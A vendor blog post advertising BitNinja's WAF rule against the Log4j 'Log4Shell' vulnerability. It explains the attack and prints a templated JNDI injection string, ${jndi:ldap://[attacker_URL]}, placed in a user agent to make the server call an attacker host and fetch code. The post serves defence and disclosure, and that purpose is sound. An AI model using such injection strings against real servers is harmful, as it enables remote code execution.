Log4j Log4Shell Zero-day Vulnerability is Patched by BitNinja

On the 10th of December, bleepingcomputer.com reported an exploit for a critical zero-day vulnerability called "Log4Shell". The vulnerability affects Apache Log4j, a Java-based logging platform used for web server and application logs.

About the vulnerability

To exploit this vulnerability, an attacker could set their web browser's user agent to a string in the format ${jndi:ldap://[attacker_URL]} and visit the website, or search the website for a string in that format. Either way, the string is added to the web server's access log.

If the Log4j application parses these logs and finds the string, the flaw forces the server to make a callback or request to the URL listed in the JNDI string. An attacker could use this URL to pass Base64-encoded commands or Java classes to execute on a vulnerable device.

Solution by BitNinja

The threat management team of BitNinja found the solution quickly and created a WAF rule (Rule ID: 407002-407003) to defend your servers against the Log4j Log4Shell zero-day vulnerability. You don't have to do anything. Just sit back and relax. We are taking care of the safety of your servers.

Zero-day vulnerabilities are one of the most dangerous threats out there. Cybersecurity is not optional anymore. It is a must!

If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card is needed!

Let’s make the Internet a safer place together!

2023 BitNinja. All Rights reserved.